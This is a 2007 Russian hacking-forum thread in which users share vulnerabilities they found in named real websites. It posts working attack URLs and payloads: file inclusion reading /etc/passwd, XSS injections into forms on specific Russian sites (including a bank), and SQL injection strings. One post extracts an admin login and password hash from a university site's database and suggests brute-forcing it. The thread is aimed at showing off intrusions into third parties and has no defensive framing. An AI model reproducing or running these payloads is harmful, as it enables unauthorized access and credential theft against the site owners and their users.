SoftoRooM LifeRooM Whois RSS GZip WAP Поиск Правила Помощь Disclaimer
Твой софтовый форумТвой софтовый форумТвой софтовый форумТвой софтовый форум

Здравствуйте Гость ( Вход | Регистрация )

Уязвимости найденные вами

Каскадный · Стандартный · [ Линейный ]

> Уязвимости найденные вами, sql-inj, php-incl, xss...

Подписка на тему | Сообщить другу | Версия для печати

 
post 13.06.2007 - 21:22
Отправлено #1
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
Начну я. smile.gif
Инклюд для начала.
QUOTE
http://ai.isi.edu/index.php?module=seminars/index&submodule=../../../../../etc/passwd
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

Reply to this topicStart new topicStart Poll
Ответов(1 - 9)
 
post 16.06.2007 - 9:27
Отправлено #2
zombie18



Опытный юзверь
**

Профиль
Группа: Пользователи
Сообщений: 70
Регистрация: 11.02.2006
Пользователь №: 119.671


Респектов: 21
-----X----


Предупреждений:  

ну вот xss докучи...
QUOTE
http://www.transtech.ru/Anketa/anketa1.htm

в поле Ф.И.О. вписываем
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.regent.ru/about/graduates.html

помоему в любое поле вообще... такую же байду:
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.vms.ru/pages/atketa.php

тоже куда хошь... ниче не фильтруется...
CODE
"><script>alert(/xss/)</script>

+1
QUOTE
http://www.osp.ru/

в поиске пишем:
CODE
"><script>alert(/xss/)</script>

+1
вот тебе и юниаструм банк (^_~)
QUOTE
http://www.uniastrum.ru/ru/ml_form/

в поле Фамилия, Имя, Отчество: тот же баг у всех на ">
CODE
"><body onLoad=alert('xss')>

+1
QUOTE
http://intv.ru/

при регистрации поле "ник" не фильтруется, можно написаль там к примеру:
CODE
"><script>alert('xss')</script>

чтобы посмотреть пример залогиньтесь с

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |


+1
QUOTE
http://www.klerk.ru/subscribe/register.php

уязвимо поле e-mail. пример использования:
CODE
http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E


Сообщение отредактировал zombie18 - 16.06.2007 - 13:48
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 29.07.2007 - 21:15
Отправлено #3
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 7.08.2007 - 18:30
Отправлено #4
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
LZA Terminologijas komisija
Один из местных универов.

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 21.08.2007 - 18:14
Отправлено #5
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
Big6: Information Skills for Student Achievement

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 21.08.2007 - 20:34
Отправлено #6
ZaHack



Большой Брат
Group Icon

Профиль
Группа: Наши Люди
Сообщений: 1.194
Регистрация: 24.01.2006
Из: Where The Eagles Fly
Пользователь №: 333


Респектов: 128
-----X----
Не совсем по теме (тут больше веб-уязвимости), но все же:
Переполнение буфера обмена программы helpctr.exe
Уязвимые ОС: Win XP
При вводе в IE строки:

Code
hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.


происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера)

PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$

PPS Работает не на всех компьютерах.
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 21.08.2007 - 23:07
Отправлено #7
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
Цитата | Quote(ZaHack @ 21.08.2007 - 20:34)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
*


А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все. smile.gif
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 28.08.2007 - 19:00
Отправлено #8
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
Code
http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/*

Таблицы лень подбирать... smile.gif
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 28.08.2007 - 19:14
Отправлено #9
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ
совмещённый трамвайно-троллейбусный сайт

Code
http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/*
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 28.08.2007 - 20:06
Отправлено #10
de1ay



xor xor
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 4.077
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 690
-----XXXX-
www.crim.ncsu.edu
Center for Robotics and Intelligent Machines

Достаем логин и хеш:
Code
http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*

admin:75bb40f591c0db371aba50f65741d73f

Можно сбрутить... Логинимся тут:
http://www.crim.ncsu.edu/login.php

Статическая инфа:
Версия: 5.0.19-max-log
Пользователь: wp_crim@engr06ws.eos.ncsu.edu
База: wp_crim
User is online!Profile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 

Reply to this topicTopic OptionsStart new topic
 
  Яндекс цитирование   Rambler's Top100
Сейчас: 2.12.2008 - 16:15
 LITE - версия | WAP - версия
Powered by I.P.B © 2008 IPS, Inc.